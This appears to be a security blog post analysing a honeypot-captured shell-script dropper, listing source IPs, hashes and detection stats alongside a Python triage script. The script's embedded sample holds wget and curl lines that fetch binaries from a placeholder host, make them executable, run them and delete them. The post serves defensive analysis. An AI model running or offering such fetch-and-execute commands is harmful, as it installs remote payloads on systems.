Script Analysis

In addition to my weekly threat intel report, I want to highlight a particular file/executable/exploit attempt I saw in the last week.  I’ll do some basic analysis of the file to better understand what it is, and what it’s trying to accomplish. Hopefully this can provide contextual data for those doing their own research.

This week we’re looking at a malicious file acting as a malware dropper. My logs show an American IP address logged into my honeypot, then reached out to a Croatian IP for the file dropper. When this script is run, it requests a number of additional payloads and attempts to save them to various directories (/tmp, /var/run, /root). Once saved, it changes the script’s permissions to be executable, runs the program, then kills the file after it completes.
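To make the fetch / save / chmod / execute / delete chain described above concrete, here is a small static triage script. It is an added example for this post, not the file recovered from the honeypot (that file's contents are not reproduced here); the sample it parses is constructed to mirror the described behaviour, and its host name is a placeholder. It pulls out the download URLs, working directories, chmod targets, executed and deleted files, flags the self-cleaning pattern, and computes the same three digests (MD5, SHA-1, SHA-256) the post lists as indicators.

```python
"""Static triage of a shell-script dropper.

Added example for this post, not the file the post analysed. SAMPLE_SCRIPT is
constructed to mirror the behaviour described (fetch payloads, save under /tmp,
/var/run or /root, chmod +x, execute, delete); its host is a placeholder.
"""
import hashlib
import re
from dataclasses import dataclass

SAMPLE_SCRIPT = r"""#!/bin/bash
cd /tmp || cd /var/run || cd /root
wget http://PLACEHOLDER.example/bins/x86 -O .x86; chmod +x .x86; ./.x86; rm -rf .x86
curl -O http://PLACEHOLDER.example/bins/arm7; chmod 777 arm7; ./arm7; rm -rf arm7
"""

# Each regex pulls out one stage of the download / chmod / execute / delete chain.
URL_RE = re.compile(r"https?://[^\s;'\"]+")
CD_RE = re.compile(r"\bcd\s+(/[^\s;|&]+)")
CHMOD_RE = re.compile(r"\bchmod\s+\S+\s+([^\s;|&]+)")
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)\./([^\s;|&]+)", re.MULTILINE)
RM_RE = re.compile(r"\brm\s+(?:-\S+\s+)*([^\s;|&]+)")


def _unique(items):
    """Deduplicate while keeping first-seen order, so output follows script order."""
    seen = set()
    return [x for x in items if not (x in seen or seen.add(x))]


@dataclass
class DropperReport:
    download_urls: list
    target_dirs: list
    chmod_targets: list
    executed: list
    deleted: list

    @property
    def self_cleaning(self) -> bool:
        # The payload is removed after it runs, leaving little on disk for forensics.
        return bool(set(self.executed) & set(self.deleted))


def triage(script: str) -> DropperReport:
    """Extract the indicators a defender wants from a suspected dropper script."""
    return DropperReport(
        download_urls=_unique(URL_RE.findall(script)),
        target_dirs=_unique(CD_RE.findall(script)),
        chmod_targets=_unique(CHMOD_RE.findall(script)),
        executed=_unique(EXEC_RE.findall(script)),
        deleted=_unique(RM_RE.findall(script)),
    )


def classify(report: DropperReport) -> str:
    """'dropper' needs the full fetch -> chmod -> run chain; 'partial' has some of it."""
    stages = (bool(report.download_urls), bool(report.chmod_targets), bool(report.executed))
    if all(stages):
        return "dropper"
    if any(stages):
        return "partial"
    return "none"


def file_hashes(data: bytes) -> dict:
    """The three digests the post lists as IoCs (MD5, SHA-1, SHA-256)."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


if __name__ == "__main__":
    rep = triage(SAMPLE_SCRIPT)
    print(classify(rep), "(self-cleaning)" if rep.self_cleaning else "")
    for url in rep.download_urls:
        print("download:", url)
    print("working dirs:", rep.target_dirs)
    print("hashes:", file_hashes(SAMPLE_SCRIPT.encode()))
```

Point `triage()` at the text of a captured script and the URL list doubles as a block list for egress filtering, while the hash dict gives the values to pivot on in VirusTotal or a SIEM. The regexes are deliberately simple; obfuscated or base64-wrapped droppers will need a decoding pass first.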

Timestamp: 2020-06-08 12:59PM PST
Initiating Source IP:
Downloaded from:
SHA256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
Virus Total Link:

File Contents:

Initiating Source IP Analysis:

Analysis Date: 2020-06-08 21:39:51
Elapsed Time: 2 seconds
Blacklist Status: BLACKLISTED 11/114
IP Address: 104.248.48.57
Reverse DNS: prod-nyc1.qencode-encoder-d9bdf0b8a9ec11ea888b0e903d539a24
ISP: Digital Ocean
Continent: North America
Country Code: (US) United States
Latitude / Longitude: 40.793 / -74.0247
City: North Bergen
Region: New Jersey

Download URL analysis:

Analysis Date: 2020-06-08 21:40:37
Elapsed Time: 3 seconds
Blacklist Status: BLACKLISTED 6/114
IP Address: 45.95.168.196
ASN Owner: Giganet Internet Szolgaltato Kft
ISP: MAXKO j.d.o.o.
Country Code: (HR) Croatia
Latitude / Longitude: 45.4675 / 16.3868
Region: Sisacko-Moslavacka Zupanija

Virus Total Stats:
As of 2020-06-08, 32/60 engines detect this file as malicious

Additional properties:
MD5: a39ab86543f724295ce2678e78d754f5
SHA-1: 7078ca1701557231495c035cba938588e5fb1b2b
SHA-256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
SSDEEP: 12:q0FoV0FS0Fd0c43fX0Fa8eekX0Flk0FVUX0Fg1FZ0FlEX0FC0FdeV8po0F7O0FQ:vo+nyc4krasvVUsg+lEsX9JnQ
File type: Shell script
Magic: Bourne-Again shell script text executable
File size: 1.48 KB (1516 bytes)

Contacted URLs:

Windows Defender:

Virus Total Graph Summary:
